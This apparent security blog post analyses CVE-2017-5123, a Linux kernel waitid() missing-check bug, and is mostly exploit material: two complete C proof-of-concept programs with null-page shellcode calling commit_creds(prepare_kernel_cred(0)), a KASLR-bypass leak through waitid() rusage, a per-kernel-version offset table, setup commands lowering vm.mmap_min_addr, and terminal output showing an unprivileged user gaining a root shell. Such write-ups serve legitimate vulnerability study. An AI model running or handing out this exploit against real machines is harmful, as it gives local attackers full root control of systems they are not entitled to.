Linux Kernel waitid() Local Privilege Escalation posted by zer0day, 10/29/2017

tl;dr

A few days ago I came across this vulnerability while searching on Google. It is a Linux kernel exploitation bug, CVE-2017-5123. It appears to work on 4.14.0-rc1 through 4.14.0-rc4; as of 2017/11/2 the latest release candidate is 4.14.0-rc7 and the latest stable build is 4.13.10.

I decided to analyze it for two reasons: ‘the payload’ and ‘the vulnerability’ itself. The payload works by triggering a null dereference, which is rarely seen these days, so my first reaction, before reading any details, was “how could that be?”. Not only that, it was also strange that such a vulnerability existed in the latest kernel!

1 - day vulnerability : CVE-2017-5123

Let’s see the title first :)

Linux Kernel 4.14.0-rc4+ - ‘waitid()’ Privilege Escalation

It’s an LPE(Local Privilege Escalation) using waitid().

Now, let’s look at how the code changed between commits and versions, and how the bug works.

Before

Before Commit.

@@ -1625,15 +1625,18 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
 	if (!infop)
 		return err;
 
-	if (put_user(err ? 0 : SIGCHLD, &infop->si_signo) ||
-	    put_user(0, &infop->si_errno) ||
-	    put_user((short)info.cause, &infop->si_code) ||
-	    put_user(info.pid, &infop->si_pid) ||
-	    put_user(info.uid, &infop->si_uid) ||
-	    put_user(info.status, &infop->si_status))
-		err = -EFAULT;
-
+	user_access_begin();
+	unsafe_put_user(err ? 0 : SIGCHLD, &infop->si_signo, Efault);
+	unsafe_put_user(0, &infop->si_errno, Efault);
+	unsafe_put_user((short)info.cause, &infop->si_code, Efault);
+	unsafe_put_user(info.pid, &infop->si_pid, Efault);
+	unsafe_put_user(info.uid, &infop->si_uid, Efault);
+	unsafe_put_user(info.status, &infop->si_status, Efault);
+	user_access_end();
 	return err;
+Efault:
+	user_access_end();
+	return -EFAULT;
 }
 
 static long kernel_wait4(pid_t upid, int __user *stat_addr,
@@ -1736,13 +1739,20 @@ COMPAT_SYSCALL_DEFINE5(waitid,
 			return -EFAULT;
 	}
 
-	if (put_user(err ? 0 : SIGCHLD, &infop->si_signo) ||
-	    put_user(0, &infop->si_errno) ||
-	    put_user((short)info.cause, &infop->si_code) ||
-	    put_user(info.pid, &infop->si_pid) ||
-	    put_user(info.uid, &infop->si_uid) ||
-	    put_user(info.status, &infop->si_status))
-		err = -EFAULT;
+	if (!infop)
+		return err;
+
+	user_access_begin();
+	unsafe_put_user(err ? 0 : SIGCHLD, &infop->si_signo, Efault);
+	unsafe_put_user(0, &infop->si_errno, Efault);
+	unsafe_put_user((short)info.cause, &infop->si_code, Efault);
+	unsafe_put_user(info.pid, &infop->si_pid, Efault);
+	unsafe_put_user(info.uid, &infop->si_uid, Efault);
+	unsafe_put_user(info.status, &infop->si_status, Efault);
+	user_access_end();
 	return err;
+Efault:
+	user_access_end();
+	return -EFAULT;
 }
 #endif

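This commit is from Linux kernel v4.13.x. In the previous waitid(), for the argument

siginfo __user *

there was code (performed by put_user()) that checked whether the address was a user-land or a kernel-land address. This commit removed that check: unsafe_put_user() does not validate the pointer. So a kernel-land address passed in from user-land through this __user pointer is written to without any validation.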

From an exploitation point of view, the form of waitid() that we use is

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

By pointing infop at a kernel address, we can write values to arbitrary kernel-land memory and so take control of it! I’m out of words :|

After

After Commit.

diff --git a/kernel/exit.c b/kernel/exit.c
index f2cd53e..cf28528 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -1610,6 +1610,9 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
 	if (!infop)
 		return err;
 
+	if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+		goto Efault;
+
 	user_access_begin();
 	unsafe_put_user(signo, &infop->si_signo, Efault);
 	unsafe_put_user(0, &infop->si_errno, Efault);
@@ -1735,6 +1738,9 @@ COMPAT_SYSCALL_DEFINE5(waitid,
 	if (!infop)
 		return err;
 
+	if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+		goto Efault;
+
 	user_access_begin();
 	unsafe_put_user(signo, &infop->si_signo, Efault);
 	unsafe_put_user(0, &infop->si_errno, Efault);

It has since been fixed as shown above.

Payload Analysis

Of course, the vulnerability above can be triggered in several different ways, but let’s look at ‘the original’ payload first :)

#define _GNU_SOURCE
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <string.h>
 
/* Opaque kernel types; only pointers to them are used in this program. */
struct cred;
struct task_struct;
  
/*
 * Function-pointer types matching the two kernel routines that get_root()
 * calls. Both are declared with regparm(3).
 */
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
  
/* Filled in by main() from get_kernel_sym(); left NULL (0) if lookup returns 0. */
prepare_kernel_cred_t   prepare_kernel_cred;
commit_creds_t    commit_creds;
  
/*
 * Replace the current process with /bin/sh when the effective check
 * getuid() == 0 succeeds; otherwise report failure.
 *
 * The failure message is also printed if execve() itself returns, because
 * execve() only returns on error.
 */
void get_shell() {
  if (getuid() != 0) {
    printf("[-] failed to get root shell :(\n");
    return;
  }

  char *shell_argv[] = {"/bin/sh", NULL};

  printf("[+] Root shell success !! :)\n");
  execve("/bin/sh", shell_argv, NULL);

  /* Only reached when execve() failed. */
  printf("[-] failed to get root shell :(\n");
}
  
/*
 * Call commit_creds(prepare_kernel_cred(0)) through the two global function
 * pointers, but only if both have been resolved to non-zero addresses.
 *
 * main() writes this function's address into the code stub it copies to
 * address 0, so it is not called directly from the C code in this file.
 */
void get_root() {
  if (commit_creds && prepare_kernel_cred)
    commit_creds(prepare_kernel_cred(0));
}
  
/*
 * Look up a symbol's address in /proc/kallsyms.
 *
 * Each line is expected to look like "<hex address> <type char> <name>",
 * optionally followed by more text; lines that do not match are skipped.
 *
 * @param name  symbol name to search for (exact, case-sensitive match)
 * @return the address printed for the first matching line, or 0 if the
 *         symbol is not listed. Note that 0 is also what the file itself
 *         reports for every symbol when the reader is not privileged.
 *
 * Exits the process with status -1 if /proc/kallsyms cannot be opened.
 */
unsigned long get_kernel_sym(char *name)
{
  FILE *f;
  unsigned long addr;
  char type;
  char sname[256];
  char line[1024];
  
  f = fopen("/proc/kallsyms", "r");
  if (f == NULL) {
    printf("[-] Failed to open /proc/kallsyms\n");
    exit(-1);
  }
  printf("[+] Find %s...\n", name);
  /* Parse one line at a time so a malformed line cannot desynchronise the scan. */
  while (fgets(line, sizeof line, f) != NULL) {
    /* %255s bounds the copy into sname; require all three fields before comparing. */
    if (sscanf(line, "%lx %c %255s", &addr, &type, sname) != 3)
      continue;
    if (!strcmp(name, sname)) {
      fclose(f);
      printf("[+] Found %s at %lx\n", name, addr);
      return addr;
    }
  }
  fclose(f);
  return 0;
}
 
/*
 * Entry point of the article's original proof-of-concept.
 *
 * Usage: ./exploit kernel_offset
 *   av[1] is parsed with strtoul() (base auto-detected) and passed to
 *   waitid() as the siginfo_t destination pointer.
 *
 * Sequence visible below: resolve two symbols through get_kernel_sym(), map
 * one page at address 0 and copy a small code stub into it, fork a child
 * that exits immediately, waitid() on that child with the caller-supplied
 * pointer, fork() once more, and call get_shell() in the parent.
 *
 * Returns EXIT_FAILURE on wrong usage or when the first fork() fails, -1
 * when mmap() fails, and EXIT_SUCCESS otherwise.
 */
int main(int ac, char **av)
{
    if (ac != 2) {
        printf("./exploit kernel_offset\n");
        printf("exemple = 0xffffffff81f3f45a");
        return EXIT_FAILURE;
    }
 
    // 2 - Call get_kernel_sym to fetch the function addresses from /proc/kallsyms
    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
    // have_canfork_callback offset <= make this dynamic as well
     
    pid_t     pid;
    /* siginfo_t info; */
 
    // 1 - Map memory at address 0x0000000000000000
    printf("[+] Try to allocat 0x00000000...\n");
    if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
        printf("[-] Failed to allocat 0x00000000\n");
        return -1;
    }
    printf("[+] Allocation success !\n");
    /* memset(0, 0xcc, 4096); */
    /*
        Assembly that the byte array below encodes:

        movq rax, 0xffffffff81f3f45a
        movq [rax], 0
        mov rax, 0x4242424242424242
        call rax
        xor rax, rax
        ret

        The 0x4242424242424242 placeholder is replaced by the address of
        get_root just below.
        NOTE(review): the first address (bytes 5A F4 F3 81) is hard-coded in
        the array and is not derived from av[1].
    https://defuse.ca/online-x86-assembler.htm#disassembly
    */
    unsigned char shellcode[] = 
    { 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
    // Locate the first 0x42 byte (start of the placeholder) and overwrite the
    // pointer-sized slot there with the address of get_root.
    void **get_root_offset = rawmemchr(shellcode, 0x42);
    (*get_root_offset) = get_root;
 
    // Copy the patched stub to the page mapped at address 0.
    memcpy(0, shellcode, sizeof(shellcode));
    /* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
 
    if(-1 == (pid = fork())) {
        perror("fork()");
        return EXIT_FAILURE;
    }
 
    if(pid == 0) {
        // Child: exit immediately so the parent has something to wait on.
        // The two statements after _exit() are never reached.
        _exit(0xDEADBEEF);
        perror("son");
        return EXIT_FAILURE;
    }
 
    // Parent: use the address given on the command line as the siginfo_t
    // output pointer. The return value of waitid() is not checked.
    siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
    waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);
 
    // TRIGGER
    pid = fork();
    printf("fork_ret = %d\n", pid); 
    if (pid > 0)
        get_shell();
    return EXIT_SUCCESS;
}

In short, here is what ‘the maker’ of that code said about it.

For exploitation, trigger a null dereference: overwrite have_canfork_callback (in the kernel’s .bss segment); if have_canfork_callback is set to a value other than 0, an unset (null) callback ends up being called. …

But…

But… let me give my humble opinion on that payload. Looking only at the payload, I can say that it does trigger the bug, but… something is missing(?). Of course, maybe that payload was made for triggering purposes only.

The reason is the testing environment: KASLR is off and mmap_min_addr is 0, so that the null dereference can be triggered.

-nokaslr sysctl -w vm.mmap_min_addr=0

1. KASLR Bypass

Let’s talk about this first. Kernel-land ASLR (KASLR) is supported from Linux kernel 4.4. When we boot with the kaslr option, KASLR is applied; if not, KASLR is off. So when we just boot the OS normally, KASLR is off.

And another question is below.

    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");

This part of the code just reads the addresses from /proc/kallsyms. In practice it does not work well, because if we read /proc/kallsyms without root permission and without KASLR, every address is shown as 0. In summary,

  • with nokaslr, a normal user gets 0 and root gets the exact address.
  • with kaslr, the addresses can be read, but they are random every time. (try it yourself!)

We can see that below.

zero@ubuntu:~$ uname -a
Linux ubuntu 4.13.8-041308-generic #201710180430 SMP Wed Oct 18 08:33:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
zero@ubuntu:~$ id
uid=1000(zero) gid=1000(zero) groups=1000(zero),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),121(lpadmin),131(sambashare)
zero@ubuntu:~$ cat /proc/kallsyms | grep prepare_kernel_cred
0000000000000000 T prepare_kernel_cred
0000000000000000 r __ksymtab_prepare_kernel_cred
0000000000000000 r __kstrtab_prepare_kernel_cred
zero@ubuntu:~$ sudo su
[sudo] password for zero: 
root@ubuntu:/home/zero# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/zero# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8c4a8390 T prepare_kernel_cred
ffffffff8d1ac010 r __ksymtab_prepare_kernel_cred
ffffffff8d1c6526 r __kstrtab_prepare_kernel_cred
root@ubuntu:/home/zero# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8c4a8390 T prepare_kernel_cred
ffffffff8d1ac010 r __ksymtab_prepare_kernel_cred
ffffffff8d1c6526 r __kstrtab_prepare_kernel_cred
root@ubuntu:/home/zero#

So, from user-land with nokaslr, we can’t get the exact addresses from /proc/kallsyms with user permission.

2. mmap_min_addr is set to 0

This value is set to 65536 by default to protect against null-dereference exploitation. (Actually, mmap_min_addr differs by platform, OS, and so on… ㅇㅅㅇ)

root@ubuntu:/etc/sysctl.d# cat *zeropage.conf

vm.mmap_min_addr = 65536
root@ubuntu:/etc/sysctl.d#

Then…?

This is not specific to this vulnerability: in the wild, to bypass mitigations and build a full exploit, at least one additional info leak is normally essential on any platform.

This vulnerability gives us a partially controlled write through infop, but if KASLR and other mitigations are present, we also need to leak the kernel base address (or something similar), and other supporting work is needed as well.

Conclusion

It is interesting that this kind of mistake can still lead to a vulnerability in the latest version of the Linux kernel ;). Anyway, it’s surprising :).

Addition 1: when mmap_min_addr is set to 0, KASLR is off, and the addresses of prepare_kernel_cred and commit_creds are already known, there could be several ways to exploit this vulnerability.

Try it Yourself :)

Addition 2: on some v4.13.x kernels with KASLR on, we can bypass KASLR with an info leak by using waitid().

Lastly, I re-made(?) the exploit code to include a KASLR bypass :). It probably only works on 4.13.0 < x <= 4.13.4, and it was patched somewhere in 4.13.x or 4.14.0-rcX.

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <sys/resource.h>

#include <syscall.h>

/* NOTE(review): neither macro is referenced anywhere in the code shown here. */
#define KASLR_BYPASS 1
#define SMEP_SMAP_BYPASS 0

/* Opaque kernel types; only pointers to them are used in this program. */
struct cred;
struct task_struct;

/* Function-pointer types for the two kernel routines called by get_root(). */
typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)__attribute__((regparm(3)));
typedef int(*commit_creds_t)(struct cred *new)__attribute__((regparm(3)));

/* Set in main(): either parsed from argv[1] or returned by kaslr_bypass(). */
unsigned long kernel_base = 0;
/* Set in main() to kernel_base plus the per-version offsets in k_offset. */
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

// sudo sysctl -w vm.mmap_min_addr=0
// sudo cat /proc/kallsyms | grep _text | head -n 1

/*
 * Per-kernel-build offsets, added to kernel_base in main().
 *
 * Row index is the <kernel_version> command-line argument. Columns, as used
 * by main() and as labelled on the 4.13.0-16 row:
 *   [0] prepare_kernel_cred
 *   [1] commit_creds
 *   [2] have_canfork_callback
 *   [3] native_read_cr4 (only given for one row; zero-initialised elsewhere
 *       and not read by the code shown here)
 *
 * The trailing remark on each row is the author's test result for that build.
 */
unsigned long k_offset[][4] = {
  { /* Linux Kernel 4.14.0-rc4+ info */ /* trigger! */
    0x753d0,
    0x75050,
    0xf3f45a,
  },
  { /* Linux Kernel 4.14.0-rc4 info */ /* triggered! but process is killed */
    0xaa6a0,
    0xaa310,
    0x106046c,
  },
  { /* Linux Kernel 4.13.0-16 info */ /* not triggered */
    0xa8530,    // prepare_kernel_cred
    0xa81a0,    // commit_creds
    0x105ff2c,  // have_canfork_callback
    0x1e540,    // native_read_cr4
  },
  { /* Linux Kernel 4.13.4 info */ /* trigger! but process is killed */
    0xa8340,
    0xa7fb0,
    0x105fe2c,
  },
  { /* Linux Kernel 4.13.8 info */ /* trigger! but process is killed */
    0xa8390,
    0xa8000,
    0x106042c,
  },
  { /* Linux Kernel 4.13.10 info */ /* not triggered */
    0xa8390,
    0xa8000,
    0x10603ac,
  },
};

/*
 * Snapshot of the calling context's CS, SS and RFLAGS, written by
 * backup_stat(). NOTE(review): nothing in the code shown here reads these
 * back; they are only mentioned in commented-out notes inside main().
 */
unsigned long user_cs = 0x0;
unsigned long user_ss = 0x0;
unsigned long user_rflags = 0x0;

/*
 * Store the current CS and SS segment selectors and the RFLAGS register
 * into user_cs, user_ss and user_rflags.
 *
 * RFLAGS is obtained by pushing it on the stack (pushfq) and popping it
 * into the output operand.
 */
void backup_stat() {  
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"
    );
}

/* Run /bin/sh through system(), but only when getuid() reports uid 0. */
void get_shell() {
  if (getuid() != 0)
    return;

  system("/bin/sh");
}
/*
 * Call commit_creds(prepare_kernel_cred(0)) through the global function
 * pointers when both are non-zero. main() patches this function's address
 * into the code stub it builds; it is not called directly from C here.
 */
void get_root() { if (commit_creds && prepare_kernel_cred) commit_creds(prepare_kernel_cred(0)); }

/*
 * Try to derive the kernel base address from data returned by waitid().
 *
 * Forks; in the parent, issues the raw waitid system call with a NULL
 * siginfo pointer and a zero-initialised struct rusage as the fifth
 * argument, then scans that struct one unsigned long at a time.
 *
 * @return for the first word strictly between 0xffffffff00000000 and
 *         0xffffffffff000000: that word with its low 20 bits cleared, minus
 *         0x100000. Returns 0 if no word matches, if fork() fails, or in
 *         the child process.
 *
 * NOTE(review): presumably relies on affected kernels leaving a kernel
 * pointer in the rusage buffer; that cannot be confirmed from this file.
 * NOTE(review): the child also returns 0 to the caller rather than exiting
 * here; main() treats 0 as failure and returns.
 */
unsigned long kaslr_bypass() {
  pid_t pid = fork();
  if (pid > 0) {
    struct rusage ru = {};
    syscall(__NR_waitid, P_PID, pid, NULL, WEXITED | WNOHANG | __WNOTHREAD, &ru);

    /* Walk the whole struct as an array of unsigned long. */
    unsigned long *p = (unsigned long *)&ru;
    for (; p < (unsigned long *)((char *)&ru + sizeof(ru)); ++p)
      if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000)
        return (*p & ~0xfffff) - 0x100000;
  }
  return 0;
}

/*
 * Entry point of the author's reworked proof-of-concept.
 *
 * Usage: prog [<kernel_base_addr>] <kernel_version>
 *   With two arguments, argv[1] is the kernel base address (parsed with
 *   strtoul, base auto-detected). With one argument, the base is obtained
 *   from kaslr_bypass(). The last argument is a row index into k_offset.
 *
 * Sequence visible below: compute three addresses from kernel_base and the
 * selected k_offset row, map one page at address 0, patch two placeholders
 * in a code stub and copy it there, fork a child that returns immediately,
 * waitid() on it with the computed have_canfork_callback address as the
 * siginfo_t pointer, fork() again, and call get_shell() in the parent.
 *
 * Returns EXIT_SUCCESS after printing usage on a wrong argument count,
 * EXIT_FAILURE when the base is 0 or when mmap/fork/waitid fail, and
 * EXIT_SUCCESS at the end otherwise.
 */
int main(int argc, char *argv[]) {
  if (!(argc == 3 || argc == 2)) {
    printf("Usage : %s [<kernel_base_addr>] <kernel_version>\n", argv[0]);
    return EXIT_SUCCESS;
  }

  if (argc == 3) kernel_base = (unsigned long)strtoul(argv[1], (char **)0, 0);
  else if (argc == 2) kernel_base = kaslr_bypass();

  /* Also the path taken by the child forked inside kaslr_bypass(). */
  if (kernel_base == 0) {
    printf("\e[31m[-] Failed to leak kernel_base:(\n");
    return EXIT_FAILURE;
  }
  
  backup_stat(); /* backup userland env */
  
  struct utsname buf;
  if (!uname(&buf)) printf("\e[36m[*] Kernel Version \e[34m: %s\n", buf.release);
  printf("\e[35m[+] Kernel Base           \e[34m: %#llx\n", (unsigned long long)kernel_base);

  /* NOTE(review): k_ver is not range-checked against the rows of k_offset. */
  int k_ver = (int)strtoul(argv[argc - 1], (char **)0, 0);

  prepare_kernel_cred = (prepare_kernel_cred_t)(kernel_base + k_offset[k_ver][0]);
  commit_creds = (commit_creds_t)(kernel_base + k_offset[k_ver][1]);
  siginfo_t *have_canfork_callback = (siginfo_t *)(kernel_base + k_offset[k_ver][2]);

  printf("\e[35m[+] prepare_kernel_cred   \e[34m: %#llx\n", (unsigned long long)prepare_kernel_cred);
  printf("\e[35m[+] commit_creds          \e[34m: %#llx\n", (unsigned long long)commit_creds);
  printf("\e[35m[+] have_canfork_callback \e[34m: %#llx\n", (unsigned long long)have_canfork_callback);

  printf("\e[36m[*] Stage 1 - Try to allocate 0x0\n");
  if (mmap((void *)0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0) == (char *)-1) {
    printf("\e[31m[-] Failed to allocate 0x0\n");
    return EXIT_FAILURE;
  }

  printf("\e[36m[*] Stage 2 - Inject shellcode\n");
  
  /*
   * Code stub with two 8-byte placeholders (0x41.. and 0x42..) that are
   * overwritten below. Lines that are commented out inside the initializer
   * are the author's notes and contribute no bytes.
   */
  unsigned char shellcode[] = {
      /* insert 0 into have_canfork_callback */
      0x48, 0xB8,
      0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, // mov rax, have_canfork_callback
      0x48, 0xC7,
      0x00, 0x00, 0x00, 0x00, 0x00,                   // mov [rax], 0x0
      /* SMEP/SMAP Bypass */
      // 0x68,
      // 0xf0, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // push 0x00000000000006f0
      // 0x5f, 0xc3,                                     // pop rdi; ret;
      // 0x0f, 0x22, 0xe7, 0xc3,                         // mov cr4, rdi; ret;
      /* call get_root() */
      0x48, 0xB8,
      0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, // mov rax, &get_root()
      0xFF, 0xD0, 0x48,                               // call rax (FF D0); the trailing 0x48 is the first byte of the xor below
      /* userland info */
      // 0x0f, 0x01, 0xf8, 0xc3                       // swapgs; ret;
      // 0x48, 0xcf                                   // iretq;
      // rip = get_shell
      // cs = user_cs
      // rflags = user_rflags
      // rsp = asm('rsp')
      // ss = user_ss
      /* jmp to nullptr */
      0x31, 0xC0, 0xC3,                               // xor rax, rax; ret;
  };

  void **offset = 0;
  
  /* Overwrite the pointer-sized slot at the first 0x41 byte. */
  offset = rawmemchr(shellcode, 0x41);
  (*offset) = have_canfork_callback;

  /*
   * Overwrite the pointer-sized slot at the first 0x42 byte.
   * NOTE(review): the search runs after the 0x41 slot has been patched, so
   * it would stop early if the address written there contains a 0x42 byte.
   */
  offset = rawmemchr(shellcode, 0x42);
  (*offset) = get_root;

  /* Copy the patched stub to the page mapped at address 0. */
  memcpy((void *)0, shellcode, sizeof(shellcode));

  pid_t pid;
  if ((pid = fork()) == -1) return EXIT_FAILURE;
  /* Child: return at once so the parent has an exited child to wait on. */
  if (pid == 0) return EXIT_FAILURE;

  printf("\e[36m[*] Stage 3 - Trigger waitid()\n");
  if (waitid(P_PID, pid, have_canfork_callback, WEXITED | WSTOPPED | WCONTINUED) == -1) {
    perror("waitpid()");
    return EXIT_FAILURE;
  }

  pid = fork(); // Trigger

  if (pid > 0) get_shell();
  return EXIT_SUCCESS;
}
/ $ id
uid=1001(zero) gid=1001(zero) groups=1001(zero)
/ $ ./exp 0xffffffff81000000 0
[*] Kernel Version : 4.14.0-rc4+
[+] Kernel Base           : 0xffffffff81000000
[+] prepare_kernel_cred   : 0xffffffff810753d0
[+] commit_creds          : 0xffffffff81075050
[+] have_canfork_callback : 0xffffffff81f3f45a
[*] Stage 1 - Try to allocate 0x0
[*] Stage 2 - Inject shellcode
[*] Stage 3 - Trigger waitid()
/ # id
uid=0(root) gid=0(root)

[+] Plus

zero@ubuntu:~/Desktop/kaslr_bypass$ ./exp 0
[*] Kernel Version : 4.13.4-041304-generic
[+] Kernel Base           : 0xffffffffa0a00000
...
zero@ubuntu:~/Desktop/kaslr_bypass$ sudo cat /proc/kallsyms | grep _text | head -n 1
ffffffffa0a00000 T _text

End